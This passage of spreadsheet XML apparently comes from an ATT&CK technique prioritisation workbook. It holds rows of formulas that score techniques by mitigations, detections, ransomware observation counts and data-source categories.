        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M59" s="37">
        <v>0</v>
      </c>
      <c r="N59" s="56">
        <v>0</v>
      </c>
      <c r="O59" s="56">
        <v>0</v>
      </c>
      <c r="P59" s="56">
        <v>0</v>
      </c>
      <c r="Q59" s="56">
        <v>0</v>
      </c>
      <c r="R59" s="57"/>
      <c r="S59" s="57">
        <v>0</v>
      </c>
      <c r="T59" s="57"/>
      <c r="U59" s="57">
        <v>0</v>
      </c>
      <c r="V59" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W59" s="37">
        <v>0</v>
      </c>
      <c r="X59" s="37">
        <v>0</v>
      </c>
      <c r="Y59" s="37">
        <v>0</v>
      </c>
      <c r="Z59" s="37">
        <v>0</v>
      </c>
      <c r="AA59" s="37">
        <v>0</v>
      </c>
      <c r="AB59" s="37">
        <v>0</v>
      </c>
      <c r="AC59" s="37" t="s">
        <v>209</v>
      </c>
      <c r="AD59" s="50" t="s">
        <v>218</v>
      </c>
      <c r="AE59" s="37" t="str" cm="1">
        <f t="array" ref="AE59">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD59)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF59" s="37">
        <v>55</v>
      </c>
      <c r="AG59" s="37" t="str" cm="1">
        <f t="array" ref="AG59">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD59)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH59" s="37">
        <v>55</v>
      </c>
      <c r="AI59" s="37" t="str" cm="1">
        <f t="array" ref="AI59">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD59)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ59" s="37">
        <v>55</v>
      </c>
      <c r="AK59" s="37" t="str" cm="1">
        <f t="array" ref="AK59">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD59)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL59" s="37">
        <v>55</v>
      </c>
      <c r="AM59" s="37" t="str" cm="1">
        <f t="array" ref="AM59">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD59)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN59" s="37">
        <v>0</v>
      </c>
      <c r="AO59" s="37"/>
      <c r="AP59" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ59" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.3666666666666671</v>
      </c>
      <c r="AR59" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS59" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT59" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU5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0" spans="1:47" ht="102">
      <c r="A60" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.56666666666666665</v>
      </c>
      <c r="B60" s="37">
        <f t="shared" si="0"/>
        <v>364.2857678571429</v>
      </c>
      <c r="C60" s="37" t="s">
        <v>247</v>
      </c>
      <c r="D60" s="50" t="s">
        <v>248</v>
      </c>
      <c r="E60" s="37"/>
      <c r="F60" s="37">
        <v>1</v>
      </c>
      <c r="G60" s="37">
        <v>1</v>
      </c>
      <c r="H60" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I60" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J60" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K60" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L60" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M60" s="37">
        <v>1</v>
      </c>
      <c r="N60" s="56">
        <v>1</v>
      </c>
      <c r="O60" s="56">
        <v>27</v>
      </c>
      <c r="P60" s="56">
        <v>16</v>
      </c>
      <c r="Q60" s="56">
        <v>27</v>
      </c>
      <c r="R60" s="57" t="s">
        <v>249</v>
      </c>
      <c r="S60" s="57">
        <v>7</v>
      </c>
      <c r="T60" s="57" t="s">
        <v>250</v>
      </c>
      <c r="U60" s="57">
        <v>12</v>
      </c>
      <c r="V60" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.51904785714285717</v>
      </c>
      <c r="W60" s="37">
        <v>19</v>
      </c>
      <c r="X60" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y60" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z60" s="37">
        <v>71</v>
      </c>
      <c r="AA60" s="37">
        <v>0.71</v>
      </c>
      <c r="AB60" s="37">
        <v>0.71</v>
      </c>
      <c r="AC60" s="37"/>
      <c r="AD60" s="50" t="s">
        <v>251</v>
      </c>
      <c r="AE60" s="37" t="str" cm="1">
        <f t="array" ref="AE60">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD60)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF60" s="37">
        <v>56</v>
      </c>
      <c r="AG60" s="37" t="str" cm="1">
        <f t="array" ref="AG60">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD60)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH60" s="37">
        <v>56</v>
      </c>
      <c r="AI60" s="37" t="str" cm="1">
        <f t="array" ref="AI60">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD60)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ60" s="37">
        <v>56</v>
      </c>
      <c r="AK60" s="37" t="str" cm="1">
        <f t="array" ref="AK60">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD60)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL60" s="37">
        <v>56</v>
      </c>
      <c r="AM60" s="37" t="str" cm="1">
        <f t="array" ref="AM60">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD60)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN60" s="37">
        <v>0</v>
      </c>
      <c r="AO60" s="37">
        <v>8</v>
      </c>
      <c r="AP60" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.56666666666666665</v>
      </c>
      <c r="AQ60" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>121.4285892857143</v>
      </c>
      <c r="AR60" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS60" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AT60" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AU6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23.319731292517005</v>
      </c>
    </row>
    <row r="61" spans="1:47" ht="17">
      <c r="A61" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B61" s="37">
        <f t="shared" si="0"/>
        <v>38.16669938095238</v>
      </c>
      <c r="C61" s="37" t="s">
        <v>252</v>
      </c>
      <c r="D61" s="50" t="s">
        <v>248</v>
      </c>
      <c r="E61" s="37" t="s">
        <v>253</v>
      </c>
      <c r="F61" s="37">
        <v>1</v>
      </c>
      <c r="G61" s="37">
        <v>1</v>
      </c>
      <c r="H61" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I61" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J61" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K61" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L61" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M61" s="37">
        <v>0</v>
      </c>
      <c r="N61" s="56">
        <v>0</v>
      </c>
      <c r="O61" s="56">
        <v>0</v>
      </c>
      <c r="P61" s="56">
        <v>0</v>
      </c>
      <c r="Q61" s="56">
        <v>0</v>
      </c>
      <c r="R61" s="57" t="s">
        <v>254</v>
      </c>
      <c r="S61" s="57">
        <v>2</v>
      </c>
      <c r="T61" s="57" t="s">
        <v>255</v>
      </c>
      <c r="U61" s="57">
        <v>5</v>
      </c>
      <c r="V61" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>6.6666809523809531E-2</v>
      </c>
      <c r="W61" s="37">
        <v>7</v>
      </c>
      <c r="X61" s="37">
        <v>0.127273</v>
      </c>
      <c r="Y61" s="37">
        <v>0.127273</v>
      </c>
      <c r="Z61" s="37">
        <v>0</v>
      </c>
      <c r="AA61" s="37">
        <v>0</v>
      </c>
      <c r="AB61" s="37">
        <v>0</v>
      </c>
      <c r="AC61" s="37"/>
      <c r="AD61" s="50" t="s">
        <v>218</v>
      </c>
      <c r="AE61" s="37" t="str" cm="1">
        <f t="array" ref="AE61">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD61)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF61" s="37">
        <v>57</v>
      </c>
      <c r="AG61" s="37" t="str" cm="1">
        <f t="array" ref="AG61">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD61)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH61" s="37">
        <v>57</v>
      </c>
      <c r="AI61" s="37" t="str" cm="1">
        <f t="array" ref="AI61">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD61)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ61" s="37">
        <v>57</v>
      </c>
      <c r="AK61" s="37" t="str" cm="1">
        <f t="array" ref="AK61">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD61)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL61" s="37">
        <v>57</v>
      </c>
      <c r="AM61" s="37" t="str" cm="1">
        <f t="array" ref="AM61">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD61)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN61" s="37">
        <v>0</v>
      </c>
      <c r="AO61" s="37">
        <v>0</v>
      </c>
      <c r="AP61" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ61" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>12.722233126984127</v>
      </c>
      <c r="AR61" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS61" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT61" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU6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2" spans="1:47" ht="17">
      <c r="A62" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B62" s="37">
        <f t="shared" si="0"/>
        <v>23.3</v>
      </c>
      <c r="C62" s="37" t="s">
        <v>256</v>
      </c>
      <c r="D62" s="50" t="s">
        <v>248</v>
      </c>
      <c r="E62" s="37" t="s">
        <v>257</v>
      </c>
      <c r="F62" s="37">
        <v>1</v>
      </c>
      <c r="G62" s="37">
        <v>1</v>
      </c>
      <c r="H62" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I62" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J62" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K62" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L62" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M62" s="37">
        <v>0</v>
      </c>
      <c r="N62" s="56">
        <v>0</v>
      </c>
      <c r="O62" s="56">
        <v>0</v>
      </c>
      <c r="P62" s="56">
        <v>0</v>
      </c>
      <c r="Q62" s="56">
        <v>0</v>
      </c>
      <c r="R62" s="57"/>
      <c r="S62" s="57">
        <v>0</v>
      </c>
      <c r="T62" s="57"/>
      <c r="U62" s="57">
        <v>0</v>
      </c>
      <c r="V62" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W62" s="37">
        <v>0</v>
      </c>
      <c r="X62" s="37">
        <v>0</v>
      </c>
      <c r="Y62" s="37">
        <v>0</v>
      </c>
      <c r="Z62" s="37">
        <v>0</v>
      </c>
      <c r="AA62" s="37">
        <v>0</v>
      </c>
      <c r="AB62" s="37">
        <v>0</v>
      </c>
      <c r="AC62" s="37"/>
      <c r="AD62" s="50" t="s">
        <v>218</v>
      </c>
      <c r="AE62" s="37" t="str" cm="1">
        <f t="array" ref="AE62">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD62)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF62" s="37">
        <v>58</v>
      </c>
      <c r="AG62" s="37" t="str" cm="1">
        <f t="array" ref="AG62">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD62)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH62" s="37">
        <v>58</v>
      </c>
      <c r="AI62" s="37" t="str" cm="1">
        <f t="array" ref="AI62">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD62)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ62" s="37">
        <v>58</v>
      </c>
      <c r="AK62" s="37" t="str" cm="1">
        <f t="array" ref="AK62">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD62)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL62" s="37">
        <v>58</v>
      </c>
      <c r="AM62" s="37" t="str" cm="1">
        <f t="array" ref="AM62">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD62)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN62" s="37">
        <v>0</v>
      </c>
      <c r="AO62" s="37">
        <v>1</v>
      </c>
      <c r="AP62" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ62" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.7666666666666666</v>
      </c>
      <c r="AR62" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS62" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT62" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU6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0.20873015873015874</v>
      </c>
    </row>
    <row r="63" spans="1:47" ht="34">
      <c r="A63" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B63" s="37">
        <f t="shared" si="0"/>
        <v>104.957188</v>
      </c>
      <c r="C63" s="37" t="s">
        <v>258</v>
      </c>
      <c r="D63" s="50" t="s">
        <v>248</v>
      </c>
      <c r="E63" s="37" t="s">
        <v>259</v>
      </c>
      <c r="F63" s="37">
        <v>1</v>
      </c>
      <c r="G63" s="37">
        <v>1</v>
      </c>
      <c r="H63" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I63" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J63" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K63" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L63" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M63" s="37">
        <v>0</v>
      </c>
      <c r="N63" s="56">
        <v>1</v>
      </c>
      <c r="O63" s="56">
        <v>21</v>
      </c>
      <c r="P63" s="56">
        <v>2</v>
      </c>
      <c r="Q63" s="56">
        <v>22</v>
      </c>
      <c r="R63" s="57" t="s">
        <v>260</v>
      </c>
      <c r="S63" s="57">
        <v>5</v>
      </c>
      <c r="T63" s="57" t="s">
        <v>261</v>
      </c>
      <c r="U63" s="57">
        <v>8</v>
      </c>
      <c r="V63" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.34285733333333335</v>
      </c>
      <c r="W63" s="37">
        <v>13</v>
      </c>
      <c r="X63" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Y63" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Z63" s="37">
        <v>46</v>
      </c>
      <c r="AA63" s="37">
        <v>0.46</v>
      </c>
      <c r="AB63" s="37">
        <v>0.46</v>
      </c>
      <c r="AC63" s="37"/>
      <c r="AD63" s="50" t="s">
        <v>262</v>
      </c>
      <c r="AE63" s="37" t="str" cm="1">
        <f t="array" ref="AE63">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD63)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF63" s="37">
        <v>59</v>
      </c>
      <c r="AG63" s="37" t="str" cm="1">
        <f t="array" ref="AG63">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD63)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH63" s="37">
        <v>59</v>
      </c>
      <c r="AI63" s="37" t="str" cm="1">
        <f t="array" ref="AI63">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD63)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ63" s="37">
        <v>59</v>
      </c>
      <c r="AK63" s="37" t="str" cm="1">
        <f t="array" ref="AK63">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD63)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL63" s="37">
        <v>59</v>
      </c>
      <c r="AM63" s="37" t="str" cm="1">
        <f t="array" ref="AM63">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD63)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN63" s="37">
        <v>0</v>
      </c>
      <c r="AO63" s="37">
        <v>2</v>
      </c>
      <c r="AP63" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ63" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>34.985729333333332</v>
      </c>
      <c r="AR63" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS63" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT63" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU6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1.7136061587301588</v>
      </c>
    </row>
    <row r="64" spans="1:47" ht="68">
      <c r="A64" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B64" s="37">
        <f t="shared" si="0"/>
        <v>27.542857142857144</v>
      </c>
      <c r="C64" s="37" t="s">
        <v>263</v>
      </c>
      <c r="D64" s="50" t="s">
        <v>248</v>
      </c>
      <c r="E64" s="37" t="s">
        <v>264</v>
      </c>
      <c r="F64" s="37">
        <v>1</v>
      </c>
      <c r="G64" s="37">
        <v>1</v>
      </c>
      <c r="H64" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I64" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J64" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K64" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L64" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M64" s="37">
        <v>0</v>
      </c>
      <c r="N64" s="56">
        <v>0</v>
      </c>
      <c r="O64" s="56">
        <v>2</v>
      </c>
      <c r="P64" s="56">
        <v>0</v>
      </c>
      <c r="Q64" s="56">
        <v>1</v>
      </c>
      <c r="R64" s="57"/>
      <c r="S64" s="57">
        <v>0</v>
      </c>
      <c r="T64" s="57"/>
      <c r="U64" s="57">
        <v>0</v>
      </c>
      <c r="V64" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.4285714285714284E-2</v>
      </c>
      <c r="W64" s="37">
        <v>0</v>
      </c>
      <c r="X64" s="37">
        <v>0</v>
      </c>
      <c r="Y64" s="37">
        <v>0</v>
      </c>
      <c r="Z64" s="37">
        <v>3</v>
      </c>
      <c r="AA64" s="37">
        <v>0.03</v>
      </c>
      <c r="AB64" s="37">
        <v>0.03</v>
      </c>
      <c r="AC64" s="37"/>
      <c r="AD64" s="50" t="s">
